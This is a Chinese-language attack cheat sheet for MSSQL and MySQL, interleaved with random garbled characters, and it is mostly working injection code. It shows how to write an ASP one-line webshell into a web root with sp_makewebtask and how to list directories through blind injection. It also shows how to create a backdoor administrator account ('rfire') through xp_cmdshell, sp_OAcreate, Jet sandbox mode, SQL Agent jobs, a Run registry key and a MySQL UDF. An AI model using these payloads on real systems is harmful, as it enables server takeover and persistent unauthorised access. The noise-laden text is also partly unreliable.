MSSQL语句导出一句话木马
8 @1 ?' Q! T( N& F) i$ D+ V# i首先确定网站的WEB路径
( \6 e, S/ M* d;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马2 x3 I x7 i5 [9 A6 Z( V2 K
5 ^/ T1 ^9 ~7 D0 c9 P;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
. S) x1 ]9 o) t. H3 C3 v! Y//将一句话木马插入表中
5 H5 I. c7 {. _" z |- d& e$ @+ D7 l' \4 I8 U4 f
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- * V% Z) R* w: S0 {' M* }
//导出一个ASP文件
& g/ |! q f, C. ~3 D' t4 u9 r$ a! o; Q; e6 j
' ^6 Z% M# n( F/ V关于MSSQL列目录
, C& }; A; O% R7 ?2 c4 \! w;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
, {" m7 U* d+ p7 dInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表6 n& W3 {% q6 ~
# J) L+ Z9 q* @% z0 g" gand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
( B5 s, F& \' ~8 f5 v2 h
. E; ?( M$ D* k( {4 D+ F7 TAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段8 C4 f3 L+ N0 j
8 @& l! o5 T6 U; \) [
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符! Y& ^6 b& L. t5 O7 Y I, j
, _' O5 K. Z$ ` n1 l& P8 E; `/ j
$ S' V0 l! [9 [数据库版本和权限查看
2 g2 W+ j( y; \# H: J; aand 1=(select @@VERSION) //查看详细的数据库信息.
7 ^8 b' t# j Vand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
4 H. b, f* C; c. v( Rand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER" o6 x: r7 o5 C8 z$ ?8 ]/ y
5 _. v$ r& ]9 n$ J6 @
4 w$ K/ ~) P4 n1.利用xp_cmdshell执行命令) Q# D* g. s% |3 Q" v. p" ~4 \+ ]
exec master..xp_cmdshell 'net user rfire 123456 /add'
4 Q/ k- c% p% c9 g! k! |exec master..xp_cmdshell 'net localgroup administrators rfire /add'" t R& L" b @5 O( x' ]
$ H, P* w7 R) c% I/ `; ?, G+ t
恢复xp_cmdshell存储过程. P( q0 j. v, O; a Z& Y6 e
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'! Y2 k0 q# w9 b; _' Q: t
) b1 _; c7 @8 h3 M& @
$ r% d8 m1 h5 C+ ?7 s2.利用SP_OAcreate和SP_OAMETHOD执行命令- d; h6 X- w, v, `; A& m3 R% u0 V
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下2 C/ v' h$ J2 J# Z# ^$ F- A
DECLARE @shell INT //建立一个@shell实体! \' g/ t* w, H' L
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
7 V' \7 Q( ?5 U4 `- n. \EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例* s, n+ w8 M u; w( v; A/ J
3 J" o2 r9 ]$ T
4 L* \/ F+ ^" a) U7 d0 ?0 A3.利用沙盒模式
1 K" S1 ?" z6 X' b9 Y先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。9 a0 g# r5 F4 m- H8 u8 p
开启沙盒模式:& ? |' e9 p$ R0 ^
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
) c9 p- k" P4 k0 d; H: O0 F: Z! J9 w; S3 z& p; \* v" P( e
执行命令:# B& s2 ~; ]) X6 T
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');% a# K* e- I% b
; H* R$ A+ A/ n0 i# X* W! {3 L5 ^" i) {' E2 x% K6 v! ~
4.利用SQL代理执行命令 s! ]) E1 W Q% `2 A
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务% |4 t% u# g" M9 z% x
- a& [/ t( L' z h
执行命令:
# e6 B' g8 w. d1 Q' B* } uuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错" E& x$ t. p D7 i
exec sp_add_job 'x'
3 `1 h% r& P. ?. o, [+ mexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业7 [: K ^+ V$ E" Q5 \# G$ O0 q
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
: V5 g) H% v( z" z* Y# M, K
5 A; N! ^5 n, a! `5 w
' k; v7 `: N4 U( f3 ^+ C5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)1 ` d5 |/ F" L3 I
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
9 D# k1 [, K" ]- K, w9 E' }% }, _( }: \% V8 j( L M# R$ K! h
. s# B5 B! C, v6 B+ G7 o6.MYSQL的命令执行
& s7 x2 _2 a- Z v- t% B1 X# [/ J7 nMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)7 U; ~0 [, C( L: J9 P
首先要在su.php下导出c:\windows\udf.dll
- `( `3 v! z Y7 [3 x导出后执行创建自定义函数命令:
j& d4 `- h- c& w* {Create Function cmdshell returns string soname 'udf.dll'
$ X$ o+ J& P( r执行命令
1 ]2 K ^$ ?+ G9 k; nselect cmdshell('net user rfire 123456 /add')
% c8 j) ]$ w* X执行后删除函数 drop function cmdshell8 I, C) X( i1 ^2 B$ _
|